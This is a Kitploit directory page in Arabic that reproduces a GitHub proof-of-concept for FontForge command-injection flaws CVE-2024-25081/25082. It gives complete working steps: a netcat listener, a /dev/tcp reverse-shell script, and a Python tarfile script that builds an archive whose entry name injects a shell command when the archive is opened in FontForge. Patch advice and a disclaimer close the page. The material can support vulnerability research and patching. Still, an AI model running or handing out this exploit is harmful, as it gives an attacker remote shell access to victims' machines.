Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-25082_CVE-2024-25081 — ثغرة حقن الأوامر في FontForge عبر اسم ملف Splinefont مصنوع خصيصًا | Kitploit
أدوات/GitHubGitHub/alielkhatteb/cve-2024-25082_cve-2024-25081
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHubalielkhatteb/cve-2024-25082_cve-2024-25081

CVE-2024-25082_CVE-2024-25081

ثغرة حقن الأوامر في FontForge عبر اسم ملف Splinefont مصنوع خصيصًا

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 5 أشهرلم تتم المراجعة بعد

⚠️ ثغرة تنفيذ أوامر عن بعد في FontForge — CVE-2024-25081 و CVE-2024-25082 - إثبات المفهوم

📖 نظرة عامة

استغلال إثبات المفهوم لثغريتي حقن أوامر في FontForge ≤ 20230101 (مكوّن Splinefont).

CVEالناقلالمشغّل
CVE-2024-25081اسم ملف مُصمَّمفتح ملف مباشر
CVE-2024-25082اسم أرشيف مُصمَّماستخراج TAR/ZIP/GZ/BZ2

يستهدف هذا الإثبات CVE-2024-25082 — عملية استخراج الأرشيف التلقائي في FontForge تمرر أسماء الملفات إلى شِل دون تعقيم، مما يسمح لحمولة مفصولة بفاصلة منقوطة مضمنة في اسم إدخال TAR بتنفيذ أوامر عشوائية.


كيف يعمل

يدعم FontForge فتح ملفات الخطوط مباشرة من الأرشيفات. عند استخراج أرشيف TAR، يقوم مكوّن Splinefont ببناء أمر شِل باستخدام اسم الملف من إدخال الأرشيف. نظرًا لأن اسم الملف غير معقَّم، فإن فاصلة منقوطة (;) في اسم الإدخال تخرج من الأمر المتوقع وتحقن تعليمات شِل عشوائية.

اسم إدخال TAR ضار:

root@kitploit:~
exploit.ttf;bash /tmp/s.sh;

عندما يعالج FontForge هذا الأرشيف، يفسره الشِل على النحو التالي:

root@kitploit:~
<أمر الاستخراج> exploit.ttf ; bash /tmp/s.sh ; 

البيئة

  • البرنامج المعرض للخطر: FontForge ≤ 20230101
  • المنصة: Linux
  • مستمع المهاجم: 192.168.1.20:4444 (تعديل حسب الحاجة)

📋 المتطلبات الأساسية

  • Python 3 (مكتبة قياسية فقط، وحدة tarfile)
  • netcat على جهاز المهاجم
  • FontForge ≤ 20230101 على الجهاز الهدف

🛠️ إثبات المفهوم

1. تشغيل مستمع netcat على جهاز المهاجم

root@kitploit:~
nc -lvnp 4444

2. إنشاء أرشيف TAR ضار

root@kitploit:~
# Write the reverse shell payload
echo 'bash -i >& /dev/tcp/192.168.1.20/4444 0>&1' > /tmp/s.sh
chmod +x /tmp/s.sh

# Build the malicious archive
python3 << 'EOF'
import tarfile, io

malicious_name = "exploit.ttf;bash /tmp/s.sh;"
tar = tarfile.open("exploit.tar", "w")
info = tarfile.TarInfo(name=malicious_name)
info.size = 4
tar.addfile(info, io.BytesIO(b"AAAA"))
tar.close()
print("done")
EOF

3. فتح الأرشيف في FontForge على الهدف

root@kitploit:~
fontforge exploit.tar

سيتصل shell عكسي بمستمعك.


🔒 التصحيح

تم إصلاحه في FontForge بعد الإصدار 20230101 عبر PR #5367. قم بالترقية إلى أحدث إصدار.

  • Debian/Ubuntu: sudo apt upgrade fontforge
  • بناء يدوي: سحب أحدث إصدار من fontforge/fontforge

🔍 المراجع

  • NVD — CVE-2024-25081
  • NVD — CVE-2024-25082
  • إصلاح FontForge PR #5367

⚖️ إخلاء المسؤولية والشروط

كود إثبات المفهوم هذا (PoC) مُقدَّم لأغراض تعليمية واختبار الاختراق المصرح به فقط.

  • لا يُمنح أي إذن لتعديل أو إعادة توزيع أو استخدام هذا الكود لأي أغراض أخرى.
  • الاستخدام غير المصرح به أو التعديل قد يكون غير قانوني وغير أخلاقي.
  • لا يتحمل المؤلفون أي مسؤولية عن أي إساءة استخدام أو أضرار.
تنزيل الأداة